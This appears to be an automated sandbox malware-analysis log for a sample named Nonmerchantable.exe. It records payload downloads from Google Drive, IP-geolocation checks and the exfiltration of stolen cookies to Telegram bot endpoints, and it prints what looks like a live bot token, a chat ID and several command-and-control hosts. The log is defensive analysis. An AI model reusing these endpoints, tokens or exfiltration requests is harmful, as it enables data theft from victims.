            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50006 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQj HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQj&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2017/02/2025%20/%2019:23:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY/sendDocument?chat_id=6838630391&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd4ff311ff9f78Host: api.telegram.orgContent-Length: 7046
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 17 Feb 2025 12:28:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3759252914.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3728236743.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: Nonmerchantable.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Nonmerchantable.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20a
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY/sendDocument?chat_id=6838
            Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036321000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036312000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036268000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: Nonmerchantable.exe, 00000005.00000002.4179767615.0000000005898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Nonmerchantable.exe, 00000005.00000002.4179767615.0000000005898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/t
            Source: Nonmerchantable.exe, 00000005.00000002.4200780131.00000000352D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQj
            Source: Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQjR
            Source: Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQjx
            Source: Nonmerchantable.exe, 00000005.00000003.3759305675.0000000005942000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058EC000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3759252914.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3728236743.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058EC000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3759252914.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3728236743.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQj&export=download
            Source: Nonmerchantable.exe, 00000005.00000003.3759305675.0000000005942000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058EC000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3759252914.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3728236743.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/w8
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000361AC000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.000000003621C000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000361AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000361D7000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.000000003621C000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037285000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373DB000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000372AC000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037237000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000374DE000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037287000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373B6000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373E1000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037212000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000374B9000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.000000003723D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037285000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373DB000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000372AC000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037237000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000374DE000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037287000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373B6000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373E1000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037212000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000374B9000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.000000003723D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
            Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:50003 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:50004 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50022 version: TLS 1.2
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_00403348
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile created: C:\Windows\BehovsundersgelsesJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_004069450_2_00406945
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_0040711C0_2_0040711C
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_6F951A980_2_6F951A98
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_004069455_2_00406945
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0040711C5_2_0040711C
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585D5485_2_0585D548
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585C46A5_2_0585C46A
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585C7385_2_0585C738
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585C19A5_2_0585C19A
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_058571185_2_05857118
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_058553705_2_05855370
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585D2815_2_0585D281
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585CCE15_2_0585CCE1
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585CFAC5_2_0585CFAC
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_05859E835_2_05859E83
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585E9885_2_0585E988
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_058569B05_2_058569B0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585CA0C5_2_0585CA0C
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_058529EC5_2_058529EC
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585E97A5_2_0585E97A
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0585F97A5_2_0585F97A
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_392551485_2_39255148
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_392518505_2_39251850
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39251FA85_2_39251FA8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_392596685_2_39259668
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39252A905_2_39252A90
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3925F9225_2_3925F922
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3925F9305_2_3925F930
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_392551385_2_39255138
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3925CDAF5_2_3925CDAF
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3925CDC05_2_3925CDC0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3925EC285_2_3925EC28
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_392500115_2_39250011
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3925EC185_2_3925EC18
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3925F0715_2_3925F071
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_392518415_2_39251841
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_392500405_2_39250040
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_392594485_2_39259448
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3925F0805_2_3925F080
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_3925F4C85_2_3925F4C8
